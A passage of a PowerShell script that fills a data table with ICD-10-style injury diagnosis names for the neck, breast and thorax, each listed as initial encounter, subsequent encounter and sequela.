encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right external jugular vein","Minor laceration of right external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right external jugular vein","Minor laceration of right external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of left external jugular vein","Minor laceration of left external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left external jugular vein","Minor laceration of left external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left external jugular vein","Minor laceration of left external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified external jugular vein","Minor laceration of unspecified external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified external jugular vein","Minor laceration of unspecified external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified external jugular vein","Minor laceration of unspecified external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of right external jugular vein","Major laceration of right external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right external jugular vein","Major laceration of right external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right external jugular vein","Major laceration of right external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of left external jugular vein","Major laceration of left external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left external jugular vein","Major laceration of left external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left external jugular vein","Major laceration of left external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified external jugular vein","Major laceration of unspecified external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified external jugular vein","Major laceration of unspecified external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified external jugular vein","Major laceration of unspecified external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right external jugular vein","Other specified injury of right external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right external jugular vein","Other specified injury of right external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right external jugular vein","Other specified injury of right external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left external jugular vein","Other specified injury of left external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left external jugular vein","Other specified injury of left external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left external jugular vein","Other specified injury of left external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified external jugular vein","Other specified injury of unspecified external jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified external jugular vein","Other specified injury of unspecified external jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified external jugular vein","Other specified injury of unspecified external jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right internal jugular vein","Unspecified injury of right internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right internal jugular vein","Unspecified injury of right internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right internal jugular vein","Unspecified injury of right internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left internal jugular vein","Unspecified injury of left internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left internal jugular vein","Unspecified injury of left internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left internal jugular vein","Unspecified injury of left internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified internal jugular vein","Unspecified injury of unspecified internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified internal jugular vein","Unspecified injury of unspecified internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified internal jugular vein","Unspecified injury of unspecified internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of right internal jugular vein","Minor laceration of right internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right internal jugular vein","Minor laceration of right internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right internal jugular vein","Minor laceration of right internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of left internal jugular vein","Minor laceration of left internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left internal jugular vein","Minor laceration of left internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left internal jugular vein","Minor laceration of left internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified internal jugular vein","Minor laceration of unspecified internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified internal jugular vein","Minor laceration of unspecified internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified internal jugular vein","Minor laceration of unspecified internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of right internal jugular vein","Major laceration of right internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right internal jugular vein","Major laceration of right internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right internal jugular vein","Major laceration of right internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of left internal jugular vein","Major laceration of left internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left internal jugular vein","Major laceration of left internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left internal jugular vein","Major laceration of left internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified internal jugular vein","Major laceration of unspecified internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified internal jugular vein","Major laceration of unspecified internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified internal jugular vein","Major laceration of unspecified internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right internal jugular vein","Other specified injury of right internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right internal jugular vein","Other specified injury of right internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right internal jugular vein","Other specified injury of right internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left internal jugular vein","Other specified injury of left internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left internal jugular vein","Other specified injury of left internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left internal jugular vein","Other specified injury of left internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified internal jugular vein","Other specified injury of unspecified internal jugular vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified internal jugular vein","Other specified injury of unspecified internal jugular vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified internal jugular vein","Other specified injury of unspecified internal jugular vein, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other specified blood vessels at neck level","Injury of other specified blood vessels at neck level, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other specified blood vessels at neck level","Injury of other specified blood vessels at neck level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other specified blood vessels at neck level","Injury of other specified blood vessels at neck level, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified blood vessel at neck level","Injury of unspecified blood vessel at neck level, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified blood vessel at neck level","Injury of unspecified blood vessel at neck level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified blood vessel at neck level","Injury of unspecified blood vessel at neck level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon at neck level","Strain of muscle, fascia and tendon at neck level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon at neck level","Strain of muscle, fascia and tendon at neck level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon at neck level","Strain of muscle, fascia and tendon at neck level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon at neck level","Laceration of muscle, fascia and tendon at neck level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon at neck level","Laceration of muscle, fascia and tendon at neck level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon at neck level","Laceration of muscle, fascia and tendon at neck level, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon at neck level","Other specified injury of muscle, fascia and tendon at neck level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon at neck level","Other specified injury of muscle, fascia and tendon at neck level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon at neck level","Other specified injury of muscle, fascia and tendon at neck level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon at neck level","Unspecified injury of muscle, fascia and tendon at neck level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon at neck level","Unspecified injury of muscle, fascia and tendon at neck level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon at neck level","Unspecified injury of muscle, fascia and tendon at neck level, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of larynx and trachea","Crushing injury of larynx and trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of larynx and trachea","Crushing injury of larynx and trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of larynx and trachea","Crushing injury of larynx and trachea, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of other specified parts of neck","Crushing injury of other specified parts of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of other specified parts of neck","Crushing injury of other specified parts of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of other specified parts of neck","Crushing injury of other specified parts of neck, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of neck, part unspecified","Crushing injury of neck, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of neck, part unspecified","Crushing injury of neck, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of neck, part unspecified","Crushing injury of neck, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified part of neck","Other specified injuries of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified part of neck","Other specified injuries of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified part of neck","Other specified injuries of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of larynx","Other specified injuries of larynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of larynx","Other specified injuries of larynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of larynx","Other specified injuries of larynx, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of cervical trachea","Other specified injuries of cervical trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of cervical trachea","Other specified injuries of cervical trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of cervical trachea","Other specified injuries of cervical trachea, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of vocal cord","Other specified injuries of vocal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of vocal cord","Other specified injuries of vocal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of vocal cord","Other specified injuries of vocal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of thyroid gland","Other specified injuries of thyroid gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of thyroid gland","Other specified injuries of thyroid gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of thyroid gland","Other specified injuries of thyroid gland, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of pharynx and cervical esophagus","Other specified injuries of pharynx and cervical esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of pharynx and cervical esophagus","Other specified injuries of pharynx and cervical esophagus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of pharynx and cervical esophagus","Other specified injuries of pharynx and cervical esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of other specified part of neck","Other specified injuries of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of other specified part of neck","Other specified injuries of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of other specified part of neck","Other specified injuries of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of neck","Unspecified injury of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of neck","Unspecified injury of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of neck","Unspecified injury of neck, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of breast, unspecified breast","Contusion of breast, unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of breast, unspecified breast","Contusion of breast, unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of breast, unspecified breast","Contusion of breast, unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right breast","Contusion of right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right breast","Contusion of right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right breast","Contusion of right breast, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left breast","Contusion of left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left breast","Contusion of left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left breast","Contusion of left breast, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, right breast","Unspecified superficial injuries of breast, right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, right breast","Unspecified superficial injuries of breast, right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, right breast","Unspecified superficial injuries of breast, right breast, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, left breast","Unspecified superficial injuries of breast, left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, left breast","Unspecified superficial injuries of breast, left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, left breast","Unspecified superficial injuries of breast, left breast, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, unspecified breast","Unspecified superficial injuries of breast, unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, unspecified breast","Unspecified superficial injuries of breast, unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of breast, unspecified breast","Unspecified superficial injuries of breast, unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, right breast","Abrasion of breast, right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, right breast","Abrasion of breast, right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, right breast","Abrasion of breast, right breast, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, left breast","Abrasion of breast, left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, left breast","Abrasion of breast, left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, left breast","Abrasion of breast, left breast, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, unspecified breast","Abrasion of breast, unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, unspecified breast","Abrasion of breast, unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of breast, unspecified breast","Abrasion of breast, unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, right breast","Blister (nonthermal) of breast, right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, right breast","Blister (nonthermal) of breast, right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, right breast","Blister (nonthermal) of breast, right breast, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, left breast","Blister (nonthermal) of breast, left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, left breast","Blister (nonthermal) of breast, left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, left breast","Blister (nonthermal) of breast, left breast, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, unspecified breast","Blister (nonthermal) of breast, unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, unspecified breast","Blister (nonthermal) of breast, unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of breast, unspecified breast","Blister (nonthermal) of breast, unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, right breast","External constriction of part of breast, right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, right breast","External constriction of part of breast, right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, right breast","External constriction of part of breast, right breast, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, left breast","External constriction of part of breast, left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, left breast","External constriction of part of breast, left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, left breast","External constriction of part of breast, left breast, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, unspecified breast","External constriction of part of breast, unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, unspecified breast","External constriction of part of breast, unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of breast, unspecified breast","External constriction of part of breast, unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, right breast","Superficial foreign body of breast, right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, right breast","Superficial foreign body of breast, right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, right breast","Superficial foreign body of breast, right breast, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, left breast","Superficial foreign body of breast, left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, left breast","Superficial foreign body of breast, left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, left breast","Superficial foreign body of breast, left breast, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, unspecified breast","Superficial foreign body of breast, unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, unspecified breast","Superficial foreign body of breast, unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of breast, unspecified breast","Superficial foreign body of breast, unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, right breast","Insect bite (nonvenomous) of breast, right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, right breast","Insect bite (nonvenomous) of breast, right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, right breast","Insect bite (nonvenomous) of breast, right breast, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, left breast","Insect bite (nonvenomous) of breast, left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, left breast","Insect bite (nonvenomous) of breast, left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, left breast","Insect bite (nonvenomous) of breast, left breast, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, unspecified breast","Insect bite (nonvenomous) of breast, unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, unspecified breast","Insect bite (nonvenomous) of breast, unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of breast, unspecified breast","Insect bite (nonvenomous) of breast, unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, right breast","Other superficial bite of breast, right breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, right breast","Other superficial bite of breast, right breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, right breast","Other superficial bite of breast, right breast, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, left breast","Other superficial bite of breast, left breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, left breast","Other superficial bite of breast, left breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, left breast","Other superficial bite of breast, left breast, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, unspecified breast","Other superficial bite of breast, unspecified breast, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, unspecified breast","Other superficial bite of breast, unspecified breast, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of breast, unspecified breast","Other superficial bite of breast, unspecified breast, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of thorax, unspecified","Contusion of thorax, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of thorax, unspecified","Contusion of thorax, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of thorax, unspecified","Contusion of thorax, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right front wall of thorax","Contusion of right front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right front wall of thorax","Contusion of right front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right front wall of thorax","Contusion of right front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left front wall of thorax","Contusion of left front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left front wall of thorax","Contusion of left front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left front wall of thorax","Contusion of left front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified front wall of thorax","Contusion of unspecified front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified front wall of thorax","Contusion of unspecified front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified front wall of thorax","Contusion of unspecified front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right back wall of thorax","Contusion of right back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right back wall of thorax","Contusion of right back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right back wall of thorax","Contusion of right back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left back wall of thorax","Contusion of left back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left back wall of thorax","Contusion of left back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left back wall of thorax","Contusion of left back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified back wall of thorax","Contusion of unspecified back wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified back wall of thorax","Contusion of unspecified back wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified back wall of thorax","Contusion of unspecified back wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of right front wall of thorax","Unspecified superficial injuries of right front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of right front wall of thorax","Unspecified superficial injuries of right front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of right front wall of thorax","Unspecified superficial injuries of right front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of left front wall of thorax","Unspecified superficial injuries of left front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of left front wall of thorax","Unspecified superficial injuries of left front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of left front wall of thorax","Unspecified superficial injuries of left front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of unspecified front wall of thorax","Unspecified superficial injuries of unspecified front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of unspecified front wall of thorax","Unspecified superficial injuries of unspecified front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of unspecified front wall of thorax","Unspecified superficial injuries of unspecified front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right front wall of thorax","Abrasion of right front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right front wall of thorax","Abrasion of right front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right front wall of thorax","Abrasion of right front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left front wall of thorax","Abrasion of left front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left front wall of thorax","Abrasion of left front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left front wall of thorax","Abrasion of left front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified front wall of thorax","Abrasion of unspecified front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified front wall of thorax","Abrasion of unspecified front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified front wall of thorax","Abrasion of unspecified front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right front wall of thorax","Blister (nonthermal) of right front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right front wall of thorax","Blister (nonthermal) of right front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right front wall of thorax","Blister (nonthermal) of right front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left front wall of thorax","Blister (nonthermal) of left front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left front wall of thorax","Blister (nonthermal) of left front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left front wall of thorax","Blister (nonthermal) of left front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified front wall of thorax","Blister (nonthermal) of unspecified front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified front wall of thorax","Blister (nonthermal) of unspecified front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified front wall of thorax","Blister (nonthermal) of unspecified front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right front wall of thorax","External constriction of right front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right front wall of thorax","External constriction of right front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right front wall of thorax","External constriction of right front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left front wall of thorax","External constriction of left front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left front wall of thorax","External constriction of left front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left front wall of thorax","External constriction of left front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified front wall of thorax","External constriction of unspecified front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified front wall of thorax","External constriction of unspecified front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified front wall of thorax","External constriction of unspecified front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right front wall of thorax","Superficial foreign body of right front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right front wall of thorax","Superficial foreign body of right front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right front wall of thorax","Superficial foreign body of right front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left front wall of thorax","Superficial foreign body of left front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left front wall of thorax","Superficial foreign body of left front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left front wall of thorax","Superficial foreign body of left front wall of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified front wall of thorax","Superficial foreign body of unspecified front wall of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified front wall of thorax","Superficial foreign body of unspecified front wall of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified front wall of 